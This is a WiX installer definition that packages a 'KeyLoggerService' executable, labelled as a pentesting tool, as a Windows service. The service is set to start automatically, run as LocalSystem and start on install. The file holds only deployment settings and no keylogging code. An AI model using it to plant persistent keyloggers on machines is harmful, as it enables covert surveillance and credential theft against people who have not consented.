<?xml version="1.0" encoding="UTF-8"?>
<Wix xmlns="http://wixtoolset.org/schemas/v4/wxs">
  <Package Name="KeyLoggerService" 
           Language="1033" 
           Version="1.0.0.0" 
           Manufacturer="PentestSuite" 
           UpgradeCode="47183794-5555-4444-3333-222222222222">
    
    <MajorUpgrade DowngradeErrorMessage="A newer version of [ProductName] is already installed." />

    <MediaTemplate EmbedCab="yes" />

    <Feature Id="ProductFeature" Title="KeyLoggerService" Level="1">
      <ComponentGroupRef Id="ProductComponents" />
    </Feature>
  </Package>

  <Fragment>
    <StandardDirectory Id="ProgramFilesFolder">
      <Directory Id="INSTALLFOLDER" Name="KeyLoggerService" />
    </StandardDirectory>
  </Fragment>

  <Fragment>
    <ComponentGroup Id="ProductComponents" Directory="INSTALLFOLDER">
      <Component Id="KeyLoggerService.exe" Guid="12345678-1234-1234-1234-123456789012">
        <File Id="KeyLoggerService.exe" Source="$(var.KeyLoggerService.TargetDir)KeyLoggerService.exe" KeyPath="yes" />
        <ServiceInstall Id="ServiceInstaller"
                        Type="ownProcess"
                        Name="KeyLoggerService"
                        DisplayName="KeyLogger Service"
                        Description="Pentesting KeyLogger Service"
                        Start="auto"
                        Account="LocalSystem"
                        ErrorControl="normal"
                        Interactive="yes" />
        <ServiceControl Id="StartService" Start="install" Stop="both" Remove="uninstall" Name="KeyLoggerService" Wait="yes" />
      </Component>
      <Component Id="KeyLoggerService.exe.config" Guid="22345678-1234-1234-1234-123456789012">
        <File Id="KeyLoggerService.exe.config" Source="$(var.KeyLoggerService.TargetDir)KeyLoggerService.exe.config" KeyPath="yes" />
      </Component>
    </ComponentGroup>
  </Fragment>
</Wix>
